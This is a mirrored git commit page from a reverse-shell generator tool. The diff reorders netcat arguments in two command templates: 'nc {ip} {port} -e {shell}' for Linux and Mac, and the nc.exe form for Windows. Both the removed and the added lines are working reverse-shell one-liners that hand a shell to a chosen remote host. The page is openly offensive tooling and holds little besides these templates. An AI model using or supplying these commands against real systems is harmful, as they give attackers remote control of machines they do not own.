mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-01-18 17:05:26 +00:00
nc -e parameter must be last :))
as said in usage help of nc -e PROG Run PROG after connect (must be last)
This commit is contained in:
parent
339e065ff9
commit
fb88a3bb87
@ -52,12 +52,12 @@ const reverseShellCommands = withCommandType(
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "nc -e",
|
"name": "nc -e",
|
||||||
"command": "nc -e {shell} {ip} {port}",
|
"command": "nc {ip} {port} -e {shell}",
|
||||||
"meta": ["linux", "mac"]
|
"meta": ["linux", "mac"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "nc.exe -e",
|
"name": "nc.exe -e",
|
||||||
"command": "nc.exe -e {shell} {ip} {port}",
|
"command": "nc.exe {ip} {port} -e {shell}",
|
||||||
"meta": ["windows"]
|
"meta": ["windows"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
Loading…
Reference in New Issue
Block a user